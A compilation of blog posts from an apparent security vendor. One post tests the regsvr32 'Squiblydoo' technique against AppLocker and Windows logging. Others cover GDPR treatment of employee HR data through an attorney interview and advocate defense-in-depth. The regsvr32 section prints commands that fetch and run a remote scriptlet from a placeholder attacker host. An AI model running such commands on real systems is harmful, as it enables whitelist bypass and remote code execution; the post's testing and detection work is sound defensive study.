To preserve my AWS computing budget – thanks Sarah for paying the bills! – I decided to test Squiblydoo on my desktop Virtual Box environment. If you want to play along at home, you can download a free Windows 7 VM from Microsoft here.

I went into AppLocker, which can be found under the Local Security Policy console within Administrative Tools. You’re essentially working with a GPO editor zoomed into Security Settings. You’ll find AppLocker under Application Control Policies.

I simply disabled script rules (below) in the home directory of an ordinary user. This tells AppLocker not to allow JavaScript, VBScript, or PowerShell to run there. The great thing about AppLocker over the older Software Restriction Policies is its selectivity: you can block a specific user — bob, in my case — while administrators can still run scripts in that directory or anywhere else.
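If you’d rather verify the rules from PowerShell than click through the GUI, AppLocker ships with a few cmdlets. A sketch — the test.js path is just my hypothetical example file:

```
# Dump the effective AppLocker policy as XML for review
Get-AppLockerPolicy -Effective -Xml

# Ask AppLocker whether a given file would be allowed to run for a given user
Get-AppLockerPolicy -Effective |
    Test-AppLockerPolicy -Path C:\Users\bob\Documents\test.js -User bob
```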

Pro tip: AppLocker depends on the Application Identity service running. You may have to start this service, depending on how the AppLocker GPO entries were configured. In my case, I had to take a quick visit to the Services console, found under Administrative Tools, to start the Application Identity service manually.

I then deposited a JScript file (with a .js suffix), containing just the bit of ActiveX code in the above scriptlet, into bob’s Documents directory. And then I tried to run it — mimicking one phase of an attack.

AppLocker blocked it as expected.

Saved by AppLocker: it prevents a JS file from being run.

And then I tried the same thing with regsvr32, using the Squiblydoo technique to run a COM scriptlet as part of a DLL initialization.

This time AppLocker failed to prevent the code from being executed.

Game, set, and match for Casey.

But if you encase the JScript in XML to make it a COM scriptlet, AppLocker fails.

And one more thing.

Squiblydoo also works if you enter a URL after the /i parameter. In other words, you can go completely fileless, pulling and executing the scriptlet from a remote site.

regsvr32 accepts a URL as well. #sneaky
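For reference, the classic Squiblydoo invocation looks something like the lines below — the server name is a placeholder, and the .sct file is the XML scriptlet shown earlier:

```
:: Local scriptlet: register nothing, just run the /i "install" code
regsvr32 /s /n /u /i:pentest.sct scrobj.dll

:: Fileless variant: pull and run the scriptlet straight from a remote server
regsvr32 /s /n /u /i:http://evilserver.example/pentest.sct scrobj.dll
```

Here /s is silent mode, /n skips DllRegisterServer, /u calls the unregister entry point, and scrobj.dll is the Windows script component runtime that actually interprets the scriptlet.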

This brings up an important point about how Squiblydoo is leveraged in real-world malware attacks. They are typically multi-step sequences in which regsvr32 might be used initially with a URL, and then later on in the attack (after more files are generated), this stealthy utility can also run a scriptlet directly from a directory.

Let’s Go to the Event Viewer

As other security experts have pointed out, Squiblydoo avoids giving away too many details in the Windows Event Viewer. That’s mostly true, as I discovered.

For my own testing, I turned on process creation auditing, which can be found under the aforementioned Local Security Policy console. My Windows 7 environment in VirtualBox now logs every process creation event — event ID 4688, if you’re following at home.

I enabled logging of all process creation events for my Windows 7 VM environment.
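The same auditing can be switched on from an elevated prompt. A sketch — note that including the full command line in 4688 events (the registry value below) requires Windows 8.1/Server 2012 R2 or a backported update, so it may not apply to a stock Windows 7 box:

```
:: Audit all process creation events (event ID 4688)
auditpol /set /subcategory:"Process Creation" /success:enable

:: Include the full command line in 4688 events (where supported)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" ^
  /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
```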

I also turned on PowerShell logging. Remember that? Microsoft had to up its security game after it became clear that PS was being exploited by hackers, so it added more granular PS auditing capabilities. I enabled Module and Script Block Logging in the PowerShell section of the GPO console. These are the same settings I used in my initial PowerShell testing, which you can read more about here.
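Under the hood, those two GPO switches map to registry values, so the same settings can be sketched without the GPO editor (script block logging needs PowerShell 5.0 or later):

```
:: Turn on PowerShell script block logging
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" ^
  /v EnableScriptBlockLogging /t REG_DWORD /d 1 /f

:: Turn on module logging (pair it with a ModuleNames entry of * to log everything)
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging" ^
  /v EnableModuleLogging /t REG_DWORD /d 1 /f
```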

Here’s what I learned.

If you run a JS script file, the Event Viewer tells you that the wscript engine was engaged. That’s the underlying software environment Windows uses to run scripts. And then, a little later in the log, you can see the details of a PowerShell session being started, along with the command line that was passed in.

You could, perhaps, piece all this together, with a little help from some event correlation tools: “Oh, a JScript file was clicked and then an ActiveX object launched a PowerShell session.”

Under Squiblydoo, this bit of evidence of a script being run is not available. #sneakier

But when I used the Squiblydoo technique, I only saw the regsvr32 command (without the command line) in the event log. And then, later, the PowerShell events show up. If you look more closely in the Applications and Services Logs section of the Event Viewer, under Windows PowerShell, you’ll see the actual command line used (because we enabled more detailed PS logging through GPO).

I strongly suspect that even good correlation software on the market would not be able to connect regsvr32 and a PowerShell session. And in a quick scan of the raw logs, a harried sysadmin who’s not up on the latest hack-craft could easily miss these clues.

Real-World RegSvr32

This brings up one last point as I mercifully close out this first post. Hackers are in the business of making it incredibly inconvenient for security pros to do their work.

Besides the PS obfuscation techniques I’ve written about, the entire attack sequence is normally broken into many different parts, with some of the actions specifically designed to throw off security monitoring tools.

In other words, instead of the attack involving a single download — the old way — it’s now spread out over several steps, with LoL Windows utilities, such as regsvr32, hiding the actual code pulls from the hacker’s site.

If you’re curious about what it’s like to analyze complex attacks like this, get yourself a few cups of coffee and watch this video. It covers Kovter malware. Or take a peek at this blog post. Enjoy!

In the next post, we’ll finish up with regsvr32 and then look at other Windows LoL-ware that can perform similar feats of malware deception.


Continue reading the next post in "Living off the Land With Microsoft"

[Transcript] Attorney Sara Jodka on the GDPR and HR Data


In reviewing the transcript of my interview with Sara Jodka, I realize again how much great information she freely dispensed. Thanks Sara! The employee-employer relationship under the GDPR is a confusing area. It might be helpful to clarify a few points Sara made in our conversation about the legitimate interest exception to consent, and the threshold for Data Protection Impact Assessments (DPIAs).

The core problem is that to process personal data under the GDPR, you need freely given consent. If you can’t get that, you have a few other options, which are covered in the GDPR’s Article 6. For employees, consent cannot be given freely, and so employers will most likely need to rely on the “legitimate interest” exception referred to in that article.

There’s a little bit of paperwork required to prove that the employer’s interest overrides the employee’s rights. In addition, employers will have to notify employees as to what data is being processed. Sara refers to the ICO, the UK’s data protection authority, which has published informal guidance, worth reading, on the legitimate interest process.

Since the data collected by the employer is also from a vulnerable subject (the employee) and contains a special class of sensitive personal data (health, payroll, union membership, etc.), it meets the threshold set by GDPR regulators — see this guidance — for performing a DPIA. As we know, DPIAs require companies to conduct a formal risk analysis of their data and document it.

Sara reminds us that some US companies, particularly service-oriented firms, may be surprised to learn about the additional work they’ll need to undertake in order to comply with the GDPR. In short: employees, like consumers, are covered under the new EU law.


Inside Out Security: Sara Jodka is an attorney with Dickinson Wright in Columbus, Ohio. Her practice covers data privacy and cybersecurity issues. Sara has guided businesses through compliance matters involving HIPAA, Gramm-Leach-Bliley, FERPA, and COPPA, and most importantly for this podcast, certification under the US-EU Privacy Shield, which, of course, falls under the General Data Protection Regulation or GDPR.

A lot of abbreviations there! Welcome, Sara.

Sara Jodka: Thank you for having me.

IOS: I wanted to get into an article that you had posted on your law firm’s blog. It points out an interesting subcategory of GDPR personal data which doesn’t get a lot of attention, and that is employee HR records. You know, of course it’s going to include ethnic, payroll, 401(k), and other information.

So can you tell us, at a high level, how the GDPR treats employee data held by companies?

Employee Data Covered By the GDPR

SJ: Whenever we look at the GDPR, there are 99 articles, and they’re very broad. There’s not a lot of detail in the GDPR regulations themselves. In fact, we only have one article that actually carves employment data out, and that’s Article 88 — there’s just the one.

Whenever we’re looking at it, none of the articles say that all of these people have these rights. All these individuals have rights! None of them say, “Well, these don’t apply in an employment situation.” So we don’t have any exclusions!

We’re led to “Yes, they do apply.” And so we’ve been waiting on, and we have been working with guidances that we’re receiving, you know, from the ICO, with respect to ….  consent obligation, notice obligation, portability requirements, and  any employee context. Because it is going to be a different type of relationship than the consumer relationship!

IOS: It’s kind of interesting that people, I think, or businesses, probably are not aware of this … except those who are in the HR business.

So I think there’s an interesting group of US companies that would find themselves under these GDPR rules that probably would not have initially thought they were in this category because they don’t collect consumer data. I’m thinking of law firms, investment banking, engineering, professional companies.

US Professional Service Companies Beware!

SJ: I think that’s a very good point! In fact, that’s where a lot of my work is actually coming from. A lot of the GDPR compliance work is coming from EU firms that specialize in EU privacy. But a lot of U.S. companies didn’t realize that this is going to cover the employment relationships they have with EU employees who are in the EU!

They thought, “Well, because we don’t actually have a physical location in the EU, it doesn’t actually cover us.” That’s not actually at all true.

The GDPR covers people that are working in the EU, people who reside in the EU, so to the extent that a U.S. company has employees that are working in the EU, it is going to cover that type of employee data. And there’s no exception in the GDPR around it. So it’s going to include those employees.

IOS: So I hadn’t even thought about that. So their records would be covered under the GDPR?

SJ: Yeah, the one thing about the definition of a data subject under the GDPR is that it doesn’t specify that it has to be an EU resident or an EU citizen. It’s just someone in the EU.

When you’re there, you have these certain rights that are guaranteed. And that will cover employees that are working for U.S. companies but they’re working in the EU.

IOS: Right. And I’m thinking perhaps of U.S. citizens who come there for some assignment and may be working out of the office; they would be covered under these rules.

SJ: And that’s definitely a possibility, and that’s one thing that we’ve been looking for. We’ve been looking for guidance from the ICO to determine … the scope of what this is going to look like, not only in an employment situation, but when we’re dealing with an immigration situation, somebody on a work visa, and also in the context of schools, as we have, you know, different students coming over to the United States or going abroad. And what protection the GDPR then applies to those kind of in-transition relationships, those employees or students.

With a lot of my clients, we are trying to err on the side of caution and so do things ahead of time, rather than beg forgiveness if the authorities come knocking at our door.

GDPR’s Legitimate Interest Exception is Tricky

IOS: I agree that’s probably a better policy, and that’s something we recommend in dealing with any of these compliance standards.

In that article, you mentioned that the processing of HR records has additional protections under the GDPR … An employee has to give explicit consent, freely given, and not as part of an employer-employee contract.

GDPR’s Article 6 says there are only six lawful ways to process data. If you don’t obtain freely given consent, then it gets tricky.

Can you explain this? And then, what does an employer have to do to process employee data  especially HR data?

SJ: Well, when we’re looking at the reasons that we’re allowed to process data, we can do it by consent, and we can also do it if we have a lawful basis.

A number of the lawful bases are going to apply in the employer context. One of those is if there is an agreement — you know, in order to comply with the terms of a contract, like a collective bargaining agreement or an employment agreement. So hire/fire and payroll data would be covered under that; also if there is … a vital interest of an employee.

There’s speculation that that exception might actually be, or that legitimate basis might be used to obtain vital information regarding, like, emergency contact information of employees.

And there’s also another lawful basis: if the employer has a greater, you know, interest in the data that isn’t outweighed by the rights of the data subject, the employee.

The issue, though, is that most of what we talk about is consumer data, and we’re looking a lot at consent and what consent actually looks like in terms of express consent — you know, having them check the box or whatever.

In an employee situation, the [UK’s] ICO has come out with guidance with respect to this. And they have expressly said that in an employee-employer relationship, there is an inherent imbalance of bargaining power, meaning an employee can never really consent to giving up their information because they have no bargaining power. They either turn it over, or they’re not employed. The employer is left to rely only on the other lawful bases to process data, excluding consent — so the contract allowance and some of the others.

But the issue I have with that is, I don’t think that that’s going to cover all the data that we actually collect on an employee, especially employees who are operating outside the scope of a collective bargaining agreement.

In a context of, say, an at-will employee where there is that … where that contract exception doesn’t actually apply. I think there will be a lot of collection of data that doesn’t actually fall under that. It may fall into the legitimate interest, if the employer has the forethought to actually do what’s required, which is to actually document the process of weighing the employer’s interest against the interest of the employee, and making sure that that is a documented process. [ Read the UK’s ICO guidelines on the process of working out legitimate interest.]

When employers claim a legitimate interest exception to getting employee consent, they have more work to do. [Source: UK ICO]

But also what comes with that is the notice requirement, and the notice requirement is something that cannot be waived. So employers, if they are doing that, are going to have to — and this is basically going to cover every single employer — they’re going to have to give their employees notice of the data that they are collecting on them, at a minimum.

IOS: At a minimum. I think to summarize what you’re saying is it’s just so tricky or difficult to get what they call freely given consent, that most employers will rely on legitimate interest.

Triggers for Data Protection Impact Assessments (DPIAs)

IOS: In the second part of this interview, we joined Sara Jodka as she explains what triggers a data protection impact assessment, or DPIA when processing employee data.

SJ: I think that’s required when we’re doing requirements for sensitive data, and we’re talking about sensitive HR data. A DPIA has to be performed when two of the following exist, and there’s like nine things that have to be there in order for a DPIA to have to be done. But you bring up a great point, because the information that an employer is going to have is going to necessarily trigger the DPIA. [See these Working Party 29 guidelines for the nine criteria that Sara refers to.]

The DPIA isn’t triggered by us doing the legitimate basis … and having to document that process. It’s actually triggered because we process sensitive data. You know, their trade union affiliation, their religious data, their ethnicity. We have sensitive information, which is one of the nine things that can trigger it, and all you need is two to require a DPIA.

Another one that employers always get is they process data of a vulnerable data subject. A vulnerable data subject includes employees.

IOS: Okay. Right.

SJ:  I can’t imagine a situation where an employer wouldn’t have to do a DPIA. The DPIA is different than the legitimate interest outweighing [employee rights] documentation that has to be done. They’re two different things.


IOS: So, they will have to do the DPIAs? And what would that involve?

SJ: Well, it’s one thing that’s required for high-risk data processing, and that, as we just discussed, includes the data that an employer has.

Essentially, what a DPIA is, it’s a process designed to describe what processing the employer does, assess its necessity and proportionality, and help manage the risks to the rights and freedoms of natural persons resulting from the processing of personal data, by assessing and determining the measures to address the data and the protections around it.

It’s a living document, so one thing to keep in mind about DPIAs is that they’re never done. They are going to be your corporation’s living document of the high-risk data you have and what’s happening with it, to help you create tools for accountability and to comply with the GDPR requirements including, you know, notice to data subjects, their rights, and then enforcing those rights.

It’s basically a tracking document … of the data, where the data’s going, where the data lives, and what happens with the data and then what happens when somebody asks for their data, wants to erase their data, etc.

GDPR Surprises for US Companies

IOS: Obviously, these are very tricky things and you definitely need an attorney to help you with it. So, can you comment on any other surprises U.S. companies might be facing with GDPR?

SJ: I think one of the most interesting points, whenever I was doing my research, to really drill down, from my knowledge level, is you’re allowed to process data so long as it’s compliant with a law. You know, there’s a legal necessity to do it.

And a lot of employers, U.S. employers specifically, looked at this and thought, “Great, that legal requirement takes the load off of me, because I need, you know, payroll records to comply with the Fair Labor Standards Act and, you know, state wage laws. I need my immigration information to comply with the immigration control forms.”

You know, they were like, “We have all these U.S. laws for why we have to retain information and why we have to collect it.” Those laws don’t count, and I think that’s a big shock when I say, well, those laws don’t count.

We can’t rely on U.S. laws to process EU data!

We can only rely on EU laws and that’s one thing that’s brought up and kind of coincides with Article 88, which I think is an interesting thing.

If you look at Article 88 when they’re talking about employee data, what Article 88 does is it actually allows member states to provide for more specific rules to ensure that the protections and the freedoms of their data are protected.

These member states may be adding on more laws and more rights than the GDPR already provides! Another thing is, not only do we have to comply with EU law, but we are also going to have to comply with member states’ other specific laws that may be more narrow than the GDPR.

Employers can’t just look at the GDPR; they’re also going to have to look at where a specific person is — whether it’s Germany or Poland. They’re going to have to look and see what aspects of the GDPR apply and then what additional, more specific laws that member state may have also put into effect.

IOS: Right!

SJ: So, I think that there are two big legal issues hanging out there that U.S. multinational companies…

IOS: One thing that comes to my mind is that there are fines involved for not complying with this. And that includes, of course, doing these DPIAs.

SJ: The fines are significant. I think the easiest way to put it is that the fines are astronomical — I mean, they’re not fines that we’re used to seeing. There are two levels of fines depending on the violation, and they can be up to 4% of a company’s annual global turnover, or 20 million euros. If you look at it in U.S. dollar terms, you’re looking at, like, $23 million at this point.

For some companies, that’s a game changer — that’s a company shutdown. Some companies can withstand that, but some can’t. And I think any time you’re facing a $23 million penalty, the cost of compliance is probably going to be worth it compared to the potential penalty.

Especially because these aren’t necessarily one-time penalties, and there’s nothing that’s going to stop the Data Protection Authority from coming back on you, reviewing again, and assessing another penalty if you aren’t in compliance and you’ve already been fined once.

I think the issue is going to be how far the reach is going to be for U.S. companies. I think for U.S. companies that have, you know, brick-and-mortar operations in a specific member state, enforcement is going to be a lot easier for the DPA.

There’s going to be a greater disadvantage to actual enforcement for, you know, U.S. companies that only operate on U.S. soil.

Now, if they have employees that are located in the EU, I think that enforcement is going to be a little bit easier, but if they don’t and they’re merely just, you know, attracting business via their website or whatever to EU, I think enforcement is gonna be a little bit more difficult, so it’s going to be interesting to see how enforcement actually plays out.

IOS: Yeah, I think you’re referring to the territorial scope aspects of the GDPR. Which, yeah, I agree that’s kind of interesting.

SJ: I guess my parting advice is this isn’t something that’s easy, it’s something that you do need to speak to an attorney. If you think that it may cover you at all, it’s at least worth a conversation. And I’ve had a lot of those conversations that have lasted, you know, a half an hour, and we’ve been very easily able to determine that GDPR is not going to cover the U.S. entity.

And we don’t have to worry about it. And some we’ve been able to identify that the GDPR is going to touch very slightly and we’re taking eight steps, you know, with the website and, you know, with, you know, on site hard copy documents to make sure that proper consent and notice is given in those documents.

So, sometimes it’s not going be the earth-shattering compliance overhaul of a corporation that you think the GDPR may entail, but it’s worth a call with a GDPR attorney to at least find out so that you can at least sleep better at night because this is a significant regulation, it’s a significant piece of law, and it is going to touch a lot of U.S. operations.

IOS: Right. Well, I want to thank you for talking about this somewhat overlooked area of the GDPR.

SJ: Thank you for having me.

Adventures in Fileless Malware: Closing Thoughts


I think we can all agree that hackers have a lot of tricks and techniques to sneakily enter your IT infrastructure and remain undetected while they steal the digital goodies. The key takeaway from this series is that signature-based detection of malware is easily nullified by even low-tech approaches, some of which I presented.

I’m very aware that prominent security researchers are now calling virus scanners useless, but don’t throw them out just yet! There’s still a lot of mint-condition legacy malware on the Intertoobz used by lazy hackers that would be blocked by these scanners.

A better philosophy in dealing with fileless malware and stealthy post-exploitation techniques is to supplement standard perimeter defenses, port scanners, and malware detectors with secondary lines of defense, and to have strategies in place for when the inevitable happens — including a breach response program.

I’m referring to, wait for it, defense-in-depth (DiD). This is a very practical approach to dealing with smart hackers who sneer at perimeter defenses, and mock signature scanning software.

Does DiD have its own problems? Sure. Those same security pros who have lost faith in traditional security measures are now promoting whitelisting of applications, which can be a very strong inner wall to protect against an initial breach.

But the code-free techniques I showed in this series can be used to get around even whitelisting. This falls under a newer hacking trend called “living off the land”, which subverts legitimate tools and software for evil purposes. In the next few weeks, I’ll post a mini-tutorial on LoL-ware. For those who want to do their homework ahead of time, start perusing this interesting github resource. Stay tuned.

Q: Can you get around Windows security protections by sneaking forbidden commands into regsvr32.exe? A: Yes, next question.
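For the curious, the caption above refers to a widely documented regsvr32 technique (often nicknamed “Squiblydoo”): regsvr32 is a signed Windows binary living in System32, and it will happily fetch and run a COM scriptlet from a URL. A hedged sketch — Windows-only, and the URL is a hypothetical placeholder:

```shell
REM Windows-only illustration; the URL and file name are hypothetical.
REM /s = silent, /n = skip DllRegisterServer, /u = "unregister",
REM /i = pass the string to DllInstall; scrobj.dll hosts the scriptlet.
regsvr32 /s /n /u /i:http://example.com/payload.sct scrobj.dll
```

Because regsvr32 is a trusted, signed Microsoft binary, whitelisting rules that allow System32 executables typically wave it through; monitoring or blocking regsvr32’s outbound network connections is a common defensive countermeasure.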

Get Real About Data Security!

In my view, defense-in-depth is about minimizing liabilities: taking what could be a potential catastrophe and transforming it into something that’s neither too terrible nor too costly.

The hacker got in, but because of your company’s excellent and restrictive permission policies, you prevented her from gaining access to sensitive data.

Or the hackers have obtained access to the sensitive data, but your awesome user-behavior analytics technology has spotted the intruders and disabled the accounts before a million credit cards could be exfiltrated.

Or perhaps the hacker has managed to find and exfiltrate a file of email addresses. However, your outstanding breach response program, which includes having near real-time information on abnormal file activities, enables you to contact the appropriate regulators (and customers affected) in near record time with detailed information on the incident, thereby letting you avoid fines and bad publicity.
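To make the user-behavior analytics scenario above concrete, here’s a minimal sketch, in Python, of the kind of baseline check such a tool performs: flag a user whose file-access count for the day jumps far above their historical norm. The threshold and the sample numbers are illustrative assumptions, not any particular product’s algorithm.

```python
from statistics import mean, stdev

def is_anomalous(history, today, z_threshold=3.0):
    """Flag today's file-access count if it sits more than
    z_threshold standard deviations above the user's baseline."""
    mu = mean(history)
    sigma = stdev(history)
    if sigma == 0:
        # Perfectly flat history: anything above the mean is suspect.
        return today > mu
    return (today - mu) / sigma > z_threshold

# A user who normally touches ~100 files suddenly touches 5,000:
print(is_anomalous([98, 102, 95, 110, 101], 5000))  # True
print(is_anomalous([98, 102, 95, 110, 101], 105))   # False
```

Real UBA products model far richer signals (time of day, file sensitivity, peer groups), but the underlying idea — compare behavior against a learned baseline — is the same.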

Common Sense Defense Advice

Defense-in-depth is more of a mind-set and philosophy, but there are some practical steps to take and, ahem, great solutions available to make it easier to implement.

If I had to take the defense-in-depth approach and turn it into three actionable bullet points, here’s what I would say:

  • Assess. Evaluate your data risks by taking an inventory of what you need to protect. Identify PII and other sensitive data, some of which may be subject to regulations, and is often scattered across huge file systems. You need to work out who has access to it and who really should have access to it. Warning: this ain’t easy to do, unless you have some help.
  • Defend. Now that you’ve found the data, limit the potential damage of future breaches by locking it down: reduce broad and global access, and simplify permission structures – avoid one-off ACLs and use group objects. Minimize the overall potential risk by retiring stale data or other data that no longer serves its original function.
  • Sustain. Maintain a secure state by automating authorization workflows, entitlement reviews, and the retention and disposition of data. And finally, monitor for unusual user and system behaviors.

Need to make your defense in depth dream a reality? Learn how we can help.

[Podcast] Attorney Sara Jodka on the GDPR and HR Data, Part II

Leave a review for our podcast & we'll send you a pack of infosec cards.


In the second part of my interview with Dickinson Wright’s Sara Jodka, we go deeper into some of the consequences of internal employee data. Under the GDPR, companies will likely have to take an additional step before they can process this data: employers will have to perform a Data Protection Impact Assessment (DPIA).

As Sara explained in the first podcast, internal employee data is covered by the GDPR — all of the new law’s requirements still apply. This means conducting a DPIA when dealing with certain classes of data, which, as we’ll learn in the podcast, includes HR data. DPIAs involve analyzing the data that’s being processed, assessing the risks involved, and putting in place the security measures to protect the data.

Last April, the EU regulators released guidance on the DPIA, covering more of the details of what triggers this extra work. Legal wonks can review and learn about the nine criteria related to launching a DPIA. Because HR data processing touches on two of the triggers — vulnerable subjects (employees) and sensitive data (HR) — it crosses the threshold set by the regulators.

Listen to Sara explain it all, and if you’re still not satisfied, have your in-house counsel review the regulator’s legalese contained in the EU guidance.

Continue reading the next post in "[Podcast] Attorney Sara Jodka on the GDPR and HR Data"

[Podcast] Attorney Sara Jodka on the GDPR and Employee HR Data, Part I



In this first part of my interview with Dickinson Wright attorney Sara Jodka, we start a discussion of how the EU General Data Protection Regulation (GDPR) treats employee data. Surprisingly, this turns out to be a tricky area of the new law. I can sum up my talk with her, which is based heavily on Jodka’s very readable legal article on this overlooked topic, as follows: darnit, employees are people too!

It may come as a surprise to some that the GDPR protects all “natural persons” in the EU. Employees, even non-citizen EU employees, are all completely natural, organic people under the GDPR. Their name, address, payroll, personal contacts, and in particular, sensitive ethnic or health data fall under the GDPR. So IT security groups will need to have all the standard GDPR security policies and procedures in place for employee data files — for example, minimize access to authorized users, set retention limits, and detect breaches.

The tricky part comes in getting “freely given” consent from employees. Listen to the podcast to learn how most EU employers will need to claim “legitimate interest” as a way to process employee data without explicit consent. This will lead to some additional administrative overhead for employers, who will have to prove their interests override the employees’ privacy and notify employees of what’s being done with the data.

As we’ll learn in the second part of the podcast, because employee data often contains sensitive data as well, employers will also have to conduct a Data Protection Impact Assessment (DPIA), which will require even more work.

Bottom line: US service-based companies in the EU — financial, legal, professional services — who thought they escaped from the GDPR’s reach because they didn’t collect consumer data are very much mistaken.

Sara explains it all.

Continue reading the next post in "[Podcast] Attorney Sara Jodka on the GDPR and HR Data"